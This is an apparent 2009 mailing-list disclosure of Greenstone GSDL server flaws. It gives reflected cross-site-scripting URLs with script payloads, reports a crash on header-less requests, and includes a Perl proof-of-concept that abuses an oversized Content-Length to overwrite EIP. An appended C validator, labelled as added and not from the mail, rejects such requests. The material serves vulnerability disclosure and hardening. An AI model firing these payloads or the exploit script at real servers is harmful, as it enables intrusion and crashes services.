[greenstone-users] Security Issues in GSLD

From: Jeremy Brown
Date: Mon Sep 14 16:11:57 2009
Subject: [greenstone-users] Security Issues in GSLD
Since I was told I could post this information to this list, I will
continue on this route for remediation of security issues in
Greenstone, particularly the GLSD.

Cross Site Scripting

http://10.10.10.100/gsdl?e=p-000-00-off-demo&a=q&h=%22%3E%3Cscript%3Ealert(%27xss%27)%3C/script%3E
http://10.10.10.100/gsdl?e=p-000-00-off-demo&a=q&q=%22%3E%3Cscript%3Ealert(%27xss%27)%3C/script%3E

Crash when not sending headers (for example: GET / HTTP/1.1\r\n\r\n or
even just )

GSLD memory corruption at Content-Length. The user can specify EIP in
decimal notation; proof of concept provided:

[gsld_mc.pl]
#!/usr/bin/perl
# gsld_mc.pl
# Greenstone 2.81 GLSD Remote Memory Corruption 0day PoC
# Jeremy Brown 2009

use IO::Socket;

$target = "10.10.10.100";   # host running the Greenstone server
$port = 80;

$eip = 2882395322; # 0xabcddcba, sent as a decimal Content-Length value

# Plain GET request; the oversized Content-Length is the only unusual element.
$payload = "GET / HTTP/1.1\r\n" . "Host: " . $target . "\r\n" .
"Referrer: " . "\r\n" . "Content-Length: " . $eip . "\r\n" .
"\r\n\r\n";

$sock = IO::Socket::INET->new(Proto=>"tcp",
PeerHost=>$target,
PeerPort=>$port)
or die "Error: $target:$port\n";

$sock->send($payload);
$sock->recv($recvbuf, 512);   # read whatever the server answers before closing

close($sock);
[/gsld_mc.pl]

Thank you,

Jeremy
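For comparison with the two crash reports above (a request with no headers, and a Content-Length large enough to be misread as a pointer), here is a hardened request-line and Content-Length check, added as an example for this thread and not code from Greenstone or from the mail. It is written in C as a native server would parse headers; MAX_BODY_LEN, parse_content_length and check_request are assumed names, and the 1 MiB cap is an assumed policy value.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>
#include <strings.h>
#define MAX_BODY_LEN ((size_t)1024 * 1024)   /* assumed policy cap, not a Greenstone value */

/* Strict Content-Length parse over [v, v+len): surrounding blanks, decimal digits only, no sign,
   never above MAX_BODY_LEN. The cap is tested before each multiply, so 2882395322 is refused
   instead of being wrapped into a 32-bit size. Returns 1 and stores the length, else 0. */
int parse_content_length(const char *v, size_t len, size_t *out)
{
    const char *end = v + len;
    size_t n = 0;
    while (v < end && (*v == ' ' || *v == '\t')) v++;
    if (v == end || !isdigit((unsigned char)*v)) return 0;   /* empty, "-1", "+5", "0x.." */
    for (; v < end && isdigit((unsigned char)*v); v++) {
        unsigned d = (unsigned)(*v - '0');
        if (n > (MAX_BODY_LEN - d) / 10) return 0;           /* n*10+d would exceed the cap */
        n = n * 10 + d;
    }
    for (; v < end; v++)                                     /* only blanks may follow */
        if (*v != ' ' && *v != '\t') return 0;
    *out = n;
    return 1;
}

/* Validate the request line and header block of a raw request. Returns the status to answer
   with: 200 when well-formed (*body_len from Content-Length, 0 if absent, so a bare
   "GET / HTTP/1.1" is fine), 400 for an empty or malformed request line or header block,
   413 when Content-Length is not a sane decimal length. */
int check_request(const char *raw, size_t *body_len)
{
    char line[512], method[16], target[256], version[16];
    *body_len = 0;
    const char *eol = strstr(raw, "\r\n");
    if (eol == NULL || eol == raw || (size_t)(eol - raw) >= sizeof line) return 400;
    memcpy(line, raw, (size_t)(eol - raw)); line[eol - raw] = '\0';
    if (sscanf(line, "%15s %255s %15s", method, target, version) != 3 ||
        strncmp(version, "HTTP/", 5) != 0) return 400;
    const char *p = eol + 2;
    while (!(p[0] == '\r' && p[1] == '\n')) {                /* a blank line ends the headers */
        const char *next = strstr(p, "\r\n");
        if (next == NULL) return 400;                        /* header block never terminated */
        const char *colon = memchr(p, ':', (size_t)(next - p));
        if (colon == NULL || colon == p) return 400;         /* header without a name */
        if (colon - p == 14 && strncasecmp(p, "Content-Length", 14) == 0 &&
            !parse_content_length(colon + 1, (size_t)(next - colon - 1), body_len)) return 413;
        p = next + 2;
    }
    return 200;
}
```

Fed the PoC payload from gsld_mc.pl, check_request answers 413 without ever using the number as a size; fed a request with no headers at all it answers 200 with a zero-length body.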